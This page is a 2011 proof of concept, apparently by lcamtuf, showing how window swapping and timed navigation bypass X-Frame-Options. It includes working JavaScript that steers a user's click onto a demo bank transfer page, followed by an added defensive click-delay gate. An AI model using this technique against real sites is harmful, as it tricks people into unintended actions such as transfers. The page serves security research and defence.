
ClickIt Proof Of Concept

Posted on 13 December 2011

<h3><i>X-Frame-Options</i> is worth less than you think</h3>

<script>
var w;
var dummy;
var it;

// Precache stuff.
var x = new Image();
x.src = 'http://banking.beaver-peak.us/banking_interface/transfers/';
var x2 = new Image();
x2.src = 'http://banking.beaver-peak.us/banking_interface/transfers/beaver-peak.jpg';
var x3 = new Image();
x3.src = 'http://lcamtuf.coredump.cx/clickit/win.html';
var x4 = new Image();
x4.src = 'http://lcamtuf.coredump.cx/clickit/win.jpg';

// Step 1: open the (already cached) target page in a new window.
function prepare() {
  w = open('http://banking.beaver-peak.us/banking_interface/transfers/', '_blank');
  setTimeout(complete, 300);
}

// Step 2: navigate that same window to the same-origin attacker page.
function complete() {
  w.location.href = 'http://lcamtuf.coredump.cx/clickit/attacker.html';
  setTimeout(goback, 1000);
}

// Step 3: poll until w.document is no longer readable (the window has left
// attacker.html and is on another origin), then send it on to win.html.
function goback() {
  try {
    if (w.document.body.innerHTML == undefined) throw 1;
    setTimeout(goback, 100);
  } catch (e) {
    // That one case where prompts.tab_modal.enabled=true would have helped in Firefox...
    if (navigator.userAgent.indexOf('Firefox/') != -1)
      setTimeout('w.location.href = "http://lcamtuf.coredump.cx/clickit/win.html"', 1500);
    else
      setTimeout('w.location.href = "http://lcamtuf.coredump.cx/clickit/win.html"', 500);
  }
}
</script>

<p>JavaScript allows you to exploit human cognitive abilities to a remarkable extent; tools such as window positioning, <code>history.forward()</code> and <code>history.back()</code> open some scary possibilities that we are <a href="http://lcamtuf.blogspot.com/2011/12/x-frame-options-or-solving-wrong.html">completely unprepared to deal with</a>. This proof-of-concept aims to demonstrate this; while it is intentionally crude and makes no real effort to conceal its operation, the transitions <a href="http://lcamtuf.coredump.cx/switch/">can be made seamless</a> and very difficult to perceive. Very accurate click prediction can be achieved by carefully measuring mouse velocity and distance to destination, too.</p>

<p>I discuss these attacks and many other unsolved challenges in web app design in <i><a href="http://lcamtuf.coredump.cx/tangled/">"The Tangled Web"</a></i>. A similar approach poses a problem with many browser UIs; for that, <a href="http://lcamtuf.blogspot.com/2010/08/on-designing-uis-for-non-robots.html">check out this post</a>.</p>

<p><input type=submit value="Click here to play a game" onclick="prepare()"></p>
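The PoC above works because the target page is swapped into the window only a few hundred milliseconds before the user's click lands, so X-Frame-Options never comes into play. One countermeasure the target page itself can apply is a settle delay: ignore clicks on a sensitive control until the document has been loaded, visible and focused for a fixed period. The following is an added example, not part of lcamtuf's PoC or any real banking site; the <code>SETTLE_MS</code> value, the <code>transfer-submit</code> element id and the <code>ClickGate</code> helper are assumptions.

```javascript
// Added example (not from the PoC): a "settle time" gate for a sensitive
// control. Each navigation creates a fresh document, and a bfcache restore via
// history.back() fires pageshow, so both restart the clock; clicks that arrive
// before SETTLE_MS has elapsed are discarded. Values below are assumptions.
const SETTLE_MS = 1000; // assumption: settle period in ms, tune per control

class ClickGate {
  constructor(settleMs) {
    this.settleMs = settleMs;
    this.settledSince = null; // time the page last became visible and focused
  }
  onShown(now) { this.settledSince = now; }   // shown/loaded/restored: restart
  onHidden() { this.settledSince = null; }    // hidden or blurred: reject clicks
  // A click at time `now` is accepted only after a full settle period.
  accepts(now) {
    return this.settledSince !== null && now - this.settledSince >= this.settleMs;
  }
}

// Browser wiring; skipped under Node, where only the gate logic is exercised.
function attachGate(doc, win, gate, buttonId) {
  const button = doc.getElementById(buttonId);
  const update = () => {
    if (doc.visibilityState === 'visible' && doc.hasFocus()) {
      gate.onShown(win.performance.now());
    } else {
      gate.onHidden();
    }
  };
  win.addEventListener('pageshow', update); // also fires on bfcache restores
  doc.addEventListener('visibilitychange', update);
  win.addEventListener('focus', update);
  win.addEventListener('blur', update);
  button.addEventListener('click', (ev) => {
    if (!gate.accepts(win.performance.now())) {
      ev.preventDefault();            // drop the form submission
      ev.stopImmediatePropagation();  // and any other click handlers
      button.setAttribute('data-blocked', 'early-click');
    }
  }, true);
  update(); // the document is being created right now: start the clock
}

if (typeof document !== 'undefined') {
  attachGate(document, window, new ClickGate(SETTLE_MS), 'transfer-submit');
}
```

This only raises the bar on the client; a transfer endpoint should still demand an explicit confirmation step on the server side rather than act on a single click.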
